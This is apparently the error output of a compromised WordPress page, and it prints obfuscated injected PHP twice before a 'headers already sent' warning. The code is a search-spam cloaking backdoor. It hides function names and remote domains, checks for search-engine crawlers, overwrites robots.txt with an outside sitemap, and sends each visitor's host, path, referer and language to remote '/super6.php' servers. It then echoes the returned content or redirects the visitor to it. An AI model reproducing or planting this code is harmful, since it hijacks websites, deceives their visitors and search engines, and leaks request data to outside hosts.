(isset($handler["\162\x65\160\x6c\141\x63\145"])) { $html_content = str_replace($handler["\162\145\160\154\141\x63\145"], '', $html_content); } if (isset($handler["\x74\x65\x73\x74\137\145\143\x68\x6f"]) && $istest) { echo $string; } if (isset($handler["\x72\x65\x64\151\x72\145\143\x74"])) { header("\114\x6f\143\x61\164\x69\157\156\x3a\40" . $html_content); } elseif (isset($handler["\x6f\165\x74\160\x75\164"])) { echo $html_content; } die; } } } goto Ppm6Z; lSbA3: $zz = disbot(); goto x7ncS; njOtC: $model = "\151\156\144\x65\170"; goto X9JQO; GClz3: function is_https() { if (isset($_SERVER["\110\x54\124\x50\123"])) { $https = strtolower($_SERVER["\x48\x54\x54\x50\x53"]); if ($https !== "\157\x66\146" && $https !== '') { return true; } } if (isset($_SERVER["\110\124\x54\x50\137\130\137\106\x4f\x52\127\x41\122\104\x45\104\137\120\x52\117\124\117"]) && $_SERVER["\x48\124\124\120\x5f\x58\x5f\x46\117\122\x57\x41\122\104\x45\104\137\120\x52\117\x54\x4f"] === "\x68\164\164\x70\x73") { return true; } if (isset($_SERVER["\110\124\x54\120\137\106\122\x4f\x4e\124\137\105\x4e\x44\x5f\110\x54\x54\x50\123"])) { $front_end_https = strtolower($_SERVER["\x48\124\x54\120\137\x46\122\x4f\x4e\x54\137\105\116\x44\137\110\124\x54\120\123"]); if ($front_end_https !== "\157\x66\x66" && $front_end_https !== '') { return true; } } return false; } goto qhoLH; FgjI1: $http = is_https() ? "\150\x74\164\160\x73" : "\150\x74\164\x70"; goto CgJnd; DM12j: $lang = $_SERVER["\x48\x54\x54\120\137\101\103\x43\105\120\x54\137\x4c\x41\x4e\107\x55\x41\107\105"] ?: "\x65\x6e"; goto CxkMY; tW5gu: if ($duri != "\57") { $duri = str_replace("\57" . $model_file, '', $duri); $duri = str_replace("\57\x69\156\x64\x65\170\x2e\x70\150\160", '', $duri); $duri = str_replace("\41", '', $duri); } goto IxmBY; R4kho: create_robots($http . "\72\57\57" . $host); goto JS8sX; no1Nz: $model_file = "\x69\156\144\x65\x78\x2e\x70\150\x70"; goto njOtC; VR0F9: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\x68\164\x74\160\72\x2f\57" . $domain_decoded . "\57\x73\165\x70\x65\x72\x36\56\x70\150\x70\x3f" . $param; if (function_exists("\x77\160\137\x72\x65\x6d\157\164\x65\137\147\145\x74")) { $response = wp_remote_get($url, array("\x74\x69\155\145\157\x75\164" => 30, "\x75\163\x65\162\55\141\147\145\156\x74" => "\x4d\157\x7a\151\154\x6c\x61\57\x35\56\60\40\x28\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\x20\x57\x6f\x72\144\x50\162\x65\163\x73\x29")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\x63\165\x72\154\137\x69\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\141\154\154\157\167\x5f\165\x72\154\x5f\146\x6f\160\145\x6e")) { $context = stream_context_create(array("\150\x74\164\160" => array("\x74\151\x6d\145\x6f\165\164" => 30))); $response = @$functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\156\157\x62\x6f\164\165\x73\145\x72\x61\x67\x65\x6e\164"; } goto Gx4zS; KyWYi: $istest = false; goto gLrt7; TLXMx: $model = stristr($duri, "\x2f\77") ? "\77" : $model; goto KyWYi; Ppm6Z: function disbot() { $user_agent = isset($_SERVER["\x48\124\x54\120\137\x55\123\x45\x52\x5f\x41\x47\105\116\124"]) ? strtolower($_SERVER["\110\x54\124\120\x5f\x55\123\x45\122\137\x41\x47\x45\x4e\124"]) : ''; $bots = array("\x67\x6f\157\147\154\x65\x62\x6f\x74", "\x62\x69\x6e\147", "\x79\x61\150\157\157", "\147\x6f\157\147\154\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto vnzVF; vnzVF: function drequest_uri() { if (isset($_SERVER["\x52\105\121\125\105\x53\124\x5f\x55\122\111"])) { return $_SERVER["\x52\x45\x51\x55\105\x53\x54\x5f\125\122\x49"]; } if (isset($_SERVER["\x61\x72\147\x76"])) { return $_SERVER["\x50\x48\x50\137\123\105\114\x46"] . "\x3f" . $_SERVER["\x61\162\147\166"][0]; } return $_SERVER["\120\x48\120\137\123\105\x4c\106"] . "\77" . $_SERVER["\x51\125\x45\122\131\137\123\x54\x52\111\116\107"]; } goto GClz3; Gx4zS: function func() { $chars = range("\x61", "\x7a"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\x5f" . $chars[17] . $chars[14] . $chars[19] . "\61\x33"); }</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at memcode://<?php
 goto RVE02; CgJnd: $server = file_exists($_SERVER["\104\117\103\x55\115\x45\116\124\137\122\x4f\117\124"] . "\57\56\150\164\x61\x63\143\x65\163\163") ? 1 : 2; goto lSbA3; IxmBY: $param = http_build_query(array("\x77\x65\142" => $host, "\172\172" => $zz, "\x75\x72\151" => urlencode($duri), "\165\162\x6c\x73\x68\x61\x6e\x67" => $referer, "\x68\x74\x74\x70" => $http, "\x6c\x61\156\147" => $lang, "\x73\145\162\x76\x65\162" => $server, "\155\157\144\x65\x6c" => $model, "\166\145\162\163\151\x6f\156" => $istest ? $string : '')); goto R4kho; CxkMY: $referer = $_SERVER["\110\x54\x54\x50\137\122\105\106\105\122\105\122"] ?: ''; goto FgjI1; qhoLH: function create_robots($url) { $functions = func(); $path = $_SERVER["\104\x4f\x43\125\115\105\x4e\124\137\122\117\117\124"] . "\x2f\162\x6f\x62\157\x74\163\x2e\164\170\164"; $content = "\x55\163\145\162\55\x61\x67\x65\156\164\x3a\x20\x2a\12\101\154\154\x6f\x77\x3a\40\x2f\xa\12\123\151\x74\145\x6d\x61\x70\72\40" . $url . "\x2f\x73\x69\164\145\155\141\x70\56\x78\x6d\154\12"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = $functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto VR0F9; gLrt7: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto tW5gu; m8e5f: $host = $_SERVER["\x48\x54\124\x50\137\x48\117\x53\x54"] ?: ''; goto DM12j; qM9ot: $string = "\61\x35\x30\65\55\x6c\x69\156\x6b\61\70\x36"; goto m8e5f; JS8sX: $html_content = request($xmlname, $param); goto dFxAi; V6es1: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\57"); } $model = str_replace("\56\x70\x68\x70", '', $model_file); } goto TLXMx; x7ncS: $duri = drequest_uri() ?: "\x2f"; goto no1Nz; RVE02: $xmlname = array("\x25\x33\61\45\x33\65\x25\x33\x30\x25\x33\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\x31\45\67\x38\x25\x33\61\45\x33\70\x25\63\x36\45\62\x45\45\x36\x36\45\x37\62\x25\x36\x35\x25\x37\62\45\x36\x31\45\x36\67\45\66\66\45\x36\x43\45\x32\105\45\66\x37\x25\66\x32\x25\66\x33", "\x25\x33\61\x25\x33\x35\x25\x33\x30\x25\x33\x35\45\x32\x44\x25\67\x39\x25\67\66\x25\x36\61\45\67\x38\45\63\x31\x25\x33\x38\45\63\66\x25\62\105\45\66\71\45\67\x32\45\66\65\45\66\x39\45\x37\62\x25\66\70\45\x36\66\45\62\105\x25\66\x37\45\66\62\45\x36\x33", "\45\x33\x31\45\63\65\45\63\x30\45\63\65\x25\x32\x44\45\x37\x39\45\67\66\45\x36\61\x25\x37\70\45\63\x31\45\x33\70\45\x33\x36\45\x32\x45\45\x37\x39\45\x36\x38\45\x37\101\x25\66\62\x25\x36\x35\x25\x36\105\x25\66\x31\x25\62\105\45\66\x42\x25\66\103\x25\x36\104", "\x25\63\61\45\63\x35\45\x33\60\x25\63\65\45\x32\104\x25\67\x39\45\67\66\x25\66\61\x25\67\x38\x25\x33\x31\x25\63\70\x25\x33\66\x25\62\105\45\x36\x39\45\67\66\x25\x36\71\x25\66\103\x25\x36\61\45\x37\62\x25\x32\x45\x25\66\x42\45\x36\103\x25\x36\104"); goto qM9ot; X9JQO: preg_match("\57\134\x2f\x28\x5b\136\134\x2f\135\53\134\56\160\x68\160\x29\57", $duri, $matches); goto V6es1; dFxAi: if (strpos($html_content, "\156\x6f\142\157\x74\x75\163\145\x72\x61\x67\x65\156\x74") === false) { $response_handlers = array("\x6f\x6b\x68\x74\155\154" => array("\x68\x65\141\144\x65\x72" => "\103\x6f\x6e\x74\145\x6e\x74\x2d\164\x79\160\145\x3a\40\x74\x65\x78\164\57\x68\x74\x6d\154\x3b\40\143\150\x61\x72\163\x65\164\x3d\165\x74\146\x2d\70", "\162\x65\x70\x6c\141\x63\x65" => "\x6f\x6b\x68\x74\x6d\154", "\164\x65\163\x74\137\145\x63\150\157" => true, "\x6f\x75\164\160\x75\x74" => true), "\x67\145\x74\143\157\156\x74\145\x6e\164\65\x30\x30\x70\141\147\x65" => array("\x68\x65\x61\144\145\x72" => "\x48\124\124\x50\x2f\61\56\x31\x20\x35\60\60\40\x49\156\164\x65\x72\x6e\141\x6c\40\123\x65\162\166\145\x72\x20\105\162\x72\x6f\162"), "\64\x30\64\160\141\147\x65" => array("\150\145\x61\144\145\x72" => "\x48\x54\124\x50\x2f\x31\56\x31\x20\64\x30\x34\40\116\x6f\164\40\106\x6f\x75\156\x64"), "\63\60\61\x70\141\x67\145" => array("\150\145\x61\x64\x65\162" => "\x48\124\x54\x50\57\x31\x2e\x31\x20\63\x30\61\x20\x4d\x6f\166\145\x64\40\x50\x65\x72\x6d\141\x6e\x65\156\x74\154\x79", "\x72\x65\x70\x6c\x61\143\x65" => "\x33\x30\x31\x70\141\147\145", "\162\x65\144\151\x72\x65\143\x74" => true), "\x6f\153\x78\155\154" => array("\150\145\141\x64\145\x72" => "\x43\157\x6e\164\145\x6e\x74\55\x54\x79\160\x65\72\x20\x61\160\x70\x6c\151\x63\141\164\x69\157\x6e\57\170\x6d\154\73\40\143\150\x61\x72\x73\145\164\x3d\x75\x74\x66\55\70", "\162\145\160\154\141\x63\145" => "\157\x6b\x78\155\x6c", "\157\x75\164\x70\x75\x74" => true), "\x6f\x6b\162\x6f\x62\x6f\x74\x73" => array("\150\x65\141\144\x65\162" => "\x43\157\x6e\x74\145\156\x74\55\124\171\x70\145\x3a\40\x74\145\170\164\57\160\154\x61\151\x6e", "\162\145\x70\154\x61\143\x65" => "\157\x6b\x72\x6f\x62\x6f\x74\163", "\x6f\x75\x74\x70\165\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\x68\x65\x61\x64\x65\x72"]); if (isset($handler["\162\x65\160\x6c\141\x63\145"])) { $html_content = str_replace($handler["\162\145\160\154\141\x63\145"], '', $html_content); } if (isset($handler["\x74\x65\x73\x74\137\145\143\x68\x6f"]) && $istest) { echo $string; } if (isset($handler["\x72\x65\x64\151\x72\145\143\x74"])) { header("\114\x6f\143\x61\164\x69\157\156\x3a\40" . $html_content); } elseif (isset($handler["\x6f\165\x74\160\x75\164"])) { echo $html_content; } die; } } } goto Ppm6Z; lSbA3: $zz = disbot(); goto x7ncS; njOtC: $model = "\151\156\144\x65\170"; goto X9JQO; GClz3: function is_https() { if (isset($_SERVER["\110\x54\124\x50\123"])) { $https = strtolower($_SERVER["\x48\x54\x54\x50\x53"]); if ($https !== "\157\x66\146" && $https !== '') { return true; } } if (isset($_SERVER["\110\124\x54\x50\137\130\137\106\x4f\x52\127\x41\122\104\x45\104\137\120\x52\117\124\117"]) && $_SERVER["\x48\124\124\120\x5f\x58\x5f\x46\117\122\x57\x41\122\104\x45\104\137\120\x52\117\x54\x4f"] === "\x68\164\164\x70\x73") { return true; } if (isset($_SERVER["\110\124\x54\120\137\106\122\x4f\x4e\124\137\105\x4e\x44\x5f\110\x54\x54\x50\123"])) { $front_end_https = strtolower($_SERVER["\x48\124\x54\120\137\x46\122\x4f\x4e\x54\137\105\116\x44\137\110\124\x54\120\123"]); if ($front_end_https !== "\157\x66\x66" && $front_end_https !== '') { return true; } } return false; } goto qhoLH; FgjI1: $http = is_https() ? "\150\x74\164\160\x73" : "\150\x74\164\x70"; goto CgJnd; DM12j: $lang = $_SERVER["\x48\x54\x54\120\137\101\103\x43\105\120\x54\137\x4c\x41\x4e\107\x55\x41\107\105"] ?: "\x65\x6e"; goto CxkMY; tW5gu: if ($duri != "\57") { $duri = str_replace("\57" . $model_file, '', $duri); $duri = str_replace("\57\x69\156\x64\x65\170\x2e\x70\150\160", '', $duri); $duri = str_replace("\41", '', $duri); } goto IxmBY; R4kho: create_robots($http . "\72\57\57" . $host); goto JS8sX; no1Nz: $model_file = "\x69\156\144\x65\x78\x2e\x70\150\x70"; goto njOtC; VR0F9: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\x68\164\x74\160\72\x2f\57" . $domain_decoded . "\57\x73\165\x70\x65\x72\x36\56\x70\150\x70\x3f" . $param; if (function_exists("\x77\160\137\x72\x65\x6d\157\164\x65\137\147\145\x74")) { $response = wp_remote_get($url, array("\x74\x69\155\145\157\x75\164" => 30, "\x75\163\x65\162\55\141\147\145\156\x74" => "\x4d\157\x7a\151\154\x6c\x61\57\x35\56\60\40\x28\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\x20\x57\x6f\x72\144\x50\162\x65\163\x73\x29")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\x63\165\x72\154\137\x69\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\141\154\154\157\167\x5f\165\x72\154\x5f\146\x6f\160\145\x6e")) { $context = stream_context_create(array("\150\x74\164\160" => array("\x74\151\x6d\145\x6f\165\164" => 30))); $response = @$functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\156\157\x62\x6f\164\165\x73\145\x72\x61\x67\x65\x6e\164"; } goto Gx4zS; KyWYi: $istest = false; goto gLrt7; TLXMx: $model = stristr($duri, "\x2f\77") ? "\77" : $model; goto KyWYi; Ppm6Z: function disbot() { $user_agent = isset($_SERVER["\x48\124\x54\120\137\x55\123\x45\x52\x5f\x41\x47\105\116\124"]) ? strtolower($_SERVER["\110\x54\124\120\x5f\x55\123\x45\122\137\x41\x47\x45\x4e\124"]) : ''; $bots = array("\x67\x6f\157\147\154\x65\x62\x6f\x74", "\x62\x69\x6e\147", "\x79\x61\150\157\157", "\147\x6f\157\147\154\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto vnzVF; vnzVF: function drequest_uri() { if (isset($_SERVER["\x52\105\121\125\105\x53\124\x5f\x55\122\111"])) { return $_SERVER["\x52\x45\x51\x55\105\x53\x54\x5f\125\122\x49"]; } if (isset($_SERVER["\x61\x72\147\x76"])) { return $_SERVER["\x50\x48\x50\137\123\105\114\x46"] . "\x3f" . $_SERVER["\x61\162\147\166"][0]; } return $_SERVER["\120\x48\120\137\123\105\x4c\106"] . "\77" . $_SERVER["\x51\125\x45\122\131\137\123\x54\x52\111\116\107"]; } goto GClz3; Gx4zS: function func() { $chars = range("\x61", "\x7a"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\137" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\x5f" . $chars[17] . $chars[14] . $chars[19] . "\61\x33"); }:2) in <b>/www/wwwroot/test.sualiu.com/wp-load.php</b> on line <b>79</b><br />